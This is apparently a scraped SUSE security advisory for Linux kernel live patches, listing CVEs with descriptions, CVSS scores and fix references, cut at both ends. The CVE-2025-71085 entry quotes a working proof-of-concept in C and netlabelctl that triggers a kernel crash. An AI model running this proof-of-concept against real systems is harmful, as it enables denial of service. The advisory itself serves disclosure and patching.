"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T10:04:27Z",
"details": "important"
}
],
"title": "CVE-2025-38159"
},
{
"cve": "CVE-2025-68284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: prevent potential out-of-bounds writes in handle_auth_session_key()\n\nThe len field originates from untrusted network packets. Boundary\nchecks have been added to prevent potential out-of-bounds writes when\ndecrypting the connection secret or processing service tickets.\n\n[ idryomov: changelog ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68284",
"url": "https://www.suse.com/security/cve/CVE-2025-68284"
},
{
"category": "external",
"summary": "SUSE Bug 1255377 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255377"
},
{
"category": "external",
"summary": "SUSE Bug 1255378 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255378"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T10:04:27Z",
"details": "important"
}
],
"title": "CVE-2025-68284"
},
{
"cve": "CVE-2025-68285",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68285"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: fix potential use-after-free in have_mon_and_osd_map()\n\nThe wait loop in __ceph_open_session() can race with the client\nreceiving a new monmap or osdmap shortly after the initial map is\nreceived. Both ceph_monc_handle_map() and handle_one_map() install\na new map immediately after freeing the old one\n\n kfree(monc-\u003emonmap);\n monc-\u003emonmap = monmap;\n\n ceph_osdmap_destroy(osdc-\u003eosdmap);\n osdc-\u003eosdmap = newmap;\n\nunder client-\u003emonc.mutex and client-\u003eosdc.lock respectively, but\nbecause neither is taken in have_mon_and_osd_map() it\u0027s possible for\nclient-\u003emonc.monmap-\u003eepoch and client-\u003eosdc.osdmap-\u003eepoch arms in\n\n client-\u003emonc.monmap \u0026\u0026 client-\u003emonc.monmap-\u003eepoch \u0026\u0026\n client-\u003eosdc.osdmap \u0026\u0026 client-\u003eosdc.osdmap-\u003eepoch;\n\ncondition to dereference an already freed map. This happens to be\nreproducible with generic/395 and generic/397 with KASAN enabled:\n\n BUG: KASAN: slab-use-after-free in have_mon_and_osd_map+0x56/0x70\n Read of size 4 at addr ffff88811012d810 by task mount.ceph/13305\n CPU: 2 UID: 0 PID: 13305 Comm: mount.ceph Not tainted 6.14.0-rc2-build2+ #1266\n ...\n Call Trace:\n \u003cTASK\u003e\n have_mon_and_osd_map+0x56/0x70\n ceph_open_session+0x182/0x290\n ceph_get_tree+0x333/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n \u003c/TASK\u003e\n\n Allocated by task 13305:\n ceph_osdmap_alloc+0x16/0x130\n ceph_osdc_init+0x27a/0x4c0\n ceph_create_client+0x153/0x190\n create_fs_client+0x50/0x2a0\n ceph_get_tree+0xff/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\n Freed by task 9475:\n kfree+0x212/0x290\n handle_one_map+0x23c/0x3b0\n ceph_osdc_handle_map+0x3c9/0x590\n mon_dispatch+0x655/0x6f0\n ceph_con_process_message+0xc3/0xe0\n ceph_con_v1_try_read+0x614/0x760\n ceph_con_workfn+0x2de/0x650\n process_one_work+0x486/0x7c0\n process_scheduled_works+0x73/0x90\n worker_thread+0x1c8/0x2a0\n kthread+0x2ec/0x300\n ret_from_fork+0x24/0x40\n ret_from_fork_asm+0x1a/0x30\n\nRewrite the wait loop to check the above condition directly with\nclient-\u003emonc.mutex and client-\u003eosdc.lock taken as appropriate. While\nat it, improve the timeout handling (previously mount_timeout could be\nexceeded in case wait_event_interruptible_timeout() slept more than\nonce) and access client-\u003eauth_err under client-\u003emonc.mutex to match\nhow it\u0027s set in finish_auth().\n\nmonmap_show() and osdmap_show() now take the respective lock before\naccessing the map as well.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68285",
"url": "https://www.suse.com/security/cve/CVE-2025-68285"
},
{
"category": "external",
"summary": "SUSE Bug 1255401 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255401"
},
{
"category": "external",
"summary": "SUSE Bug 1255402 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255402"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T10:04:27Z",
"details": "important"
}
],
"title": "CVE-2025-68285"
},
{
"cve": "CVE-2025-68813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipvs: fix ipv4 null-ptr-deref in route error path\n\nThe IPv4 code path in __ip_vs_get_out_rt() calls dst_link_failure()\nwithout ensuring skb-\u003edev is set, leading to a NULL pointer dereference\nin fib_compute_spec_dst() when ipv4_link_failure() attempts to send\nICMP destination unreachable messages.\n\nThe issue emerged after commit ed0de45a1008 (\"ipv4: recompile ip options\nin ipv4_link_failure\") started calling __ip_options_compile() from\nipv4_link_failure(). This code path eventually calls fib_compute_spec_dst()\nwhich dereferences skb-\u003edev. An attempt was made to fix the NULL skb-\u003edev\ndereference in commit 0113d9c9d1cc (\"ipv4: fix null-deref in\nipv4_link_failure\"), but it only addressed the immediate dev_net(skb-\u003edev)\ndereference by using a fallback device. The fix was incomplete because\nfib_compute_spec_dst() later in the call chain still accesses skb-\u003edev\ndirectly, which remains NULL when IPVS calls dst_link_failure().\n\nThe crash occurs when:\n1. IPVS processes a packet in NAT mode with a misconfigured destination\n2. Route lookup fails in __ip_vs_get_out_rt() before establishing a route\n3. The error path calls dst_link_failure(skb) with skb-\u003edev == NULL\n4. ipv4_link_failure() -\u003e ipv4_send_dest_unreach() -\u003e\n __ip_options_compile() -\u003e fib_compute_spec_dst()\n5. fib_compute_spec_dst() dereferences NULL skb-\u003edev\n\nApply the same fix used for IPv6 in commit 326bf17ea5d4 (\"ipvs: fix\nipv6 route unreach panic\"): set skb-\u003edev from skb_dst(skb)-\u003edev before\ncalling dst_link_failure().\n\nKASAN: null-ptr-deref in range [0x0000000000000328-0x000000000000032f]\nCPU: 1 PID: 12732 Comm: syz.1.3469 Not tainted 6.6.114 #2\nRIP: 0010:__in_dev_get_rcu include/linux/inetdevice.h:233\nRIP: 0010:fib_compute_spec_dst+0x17a/0x9f0 net/ipv4/fib_frontend.c:285\nCall Trace:\n \u003cTASK\u003e\n spec_dst_fill net/ipv4/ip_options.c:232\n spec_dst_fill net/ipv4/ip_options.c:229\n __ip_options_compile+0x13a1/0x17d0 net/ipv4/ip_options.c:330\n ipv4_send_dest_unreach net/ipv4/route.c:1252\n ipv4_link_failure+0x702/0xb80 net/ipv4/route.c:1265\n dst_link_failure include/net/dst.h:437\n __ip_vs_get_out_rt+0x15fd/0x19e0 net/netfilter/ipvs/ip_vs_xmit.c:412\n ip_vs_nat_xmit+0x1d8/0xc80 net/netfilter/ipvs/ip_vs_xmit.c:764",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68813",
"url": "https://www.suse.com/security/cve/CVE-2025-68813"
},
{
"category": "external",
"summary": "SUSE Bug 1256641 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "external",
"summary": "SUSE Bug 1256644 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256644"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T10:04:27Z",
"details": "important"
}
],
"title": "CVE-2025-68813"
},
{
"cve": "CVE-2025-71085",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71085"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg-\u003ecmsg_len = cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71085",
"url": "https://www.suse.com/security/cve/CVE-2025-71085"
},
{
"category": "external",
"summary": "SUSE Bug 1256623 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "external",
"summary": "SUSE Bug 1256624 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T10:04:27Z",
"details": "important"
}
],
"title": "CVE-2025-71085"
}
]
}
SUSE-SU-2026:1073-1
Vulnerability from csaf_suse - Published: 2026-03-26 12:33 - Updated: 2026-03-26 12:33Summary
Security update for the Linux Kernel (Live Patch 10 for SUSE Linux Enterprise 15 SP6)
Severity
Important
Notes
Title of the patch: Security update for the Linux Kernel (Live Patch 10 for SUSE Linux Enterprise 15 SP6)
Description of the patch:
This update for the SUSE Linux Enterprise Kernel 6.4.0-150600.23.47 fixes various security issues
The following security issues were fixed:
- CVE-2025-38159: wifi: rtw88: fix the 'para' buffer size to avoid reading out of bounds (bsc#1257629).
- CVE-2025-38488: smb: client: fix use-after-free in crypt_message when using async crypto (bsc#1247240).
- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1255053).
- CVE-2025-40284: Bluetooth: MGMT: cancel mesh send timer when hdev removed (bsc#1257669).
- CVE-2025-40297: net: bridge: fix use-after-free due to MST port state bypass (bsc#1255895).
- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).
- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).
- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).
- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).
Patchnames: SUSE-2026-1071,SUSE-2026-1073,SUSE-2026-1082,SUSE-SLE-Module-Live-Patching-15-SP6-2026-1073
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.8 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.8 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.3 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
References
49 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for the Linux Kernel (Live Patch 10 for SUSE Linux Enterprise 15 SP6)",
"title": "Title of the patch"
},
{
"category": "description",
"text": "\nThis update for the SUSE Linux Enterprise Kernel 6.4.0-150600.23.47 fixes various security issues\n\nThe following security issues were fixed:\n\n- CVE-2025-38159: wifi: rtw88: fix the \u0027para\u0027 buffer size to avoid reading out of bounds (bsc#1257629).\n- CVE-2025-38488: smb: client: fix use-after-free in crypt_message when using async crypto (bsc#1247240).\n- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1255053).\n- CVE-2025-40284: Bluetooth: MGMT: cancel mesh send timer when hdev removed (bsc#1257669).\n- CVE-2025-40297: net: bridge: fix use-after-free due to MST port state bypass (bsc#1255895).\n- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).\n- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).\n- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).\n- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2026-1071,SUSE-2026-1073,SUSE-2026-1082,SUSE-SLE-Module-Live-Patching-15-SP6-2026-1073",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_1073-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:1073-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261073-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:1073-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024955.html"
},
{
"category": "self",
"summary": "SUSE Bug 1247240",
"url": "https://bugzilla.suse.com/1247240"
},
{
"category": "self",
"summary": "SUSE Bug 1255053",
"url": "https://bugzilla.suse.com/1255053"
},
{
"category": "self",
"summary": "SUSE Bug 1255378",
"url": "https://bugzilla.suse.com/1255378"
},
{
"category": "self",
"summary": "SUSE Bug 1255402",
"url": "https://bugzilla.suse.com/1255402"
},
{
"category": "self",
"summary": "SUSE Bug 1255895",
"url": "https://bugzilla.suse.com/1255895"
},
{
"category": "self",
"summary": "SUSE Bug 1256624",
"url": "https://bugzilla.suse.com/1256624"
},
{
"category": "self",
"summary": "SUSE Bug 1256644",
"url": "https://bugzilla.suse.com/1256644"
},
{
"category": "self",
"summary": "SUSE Bug 1257629",
"url": "https://bugzilla.suse.com/1257629"
},
{
"category": "self",
"summary": "SUSE Bug 1257669",
"url": "https://bugzilla.suse.com/1257669"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38159 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38159/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38488 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38488/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40258 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40258/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40297 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40297/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68284 page",
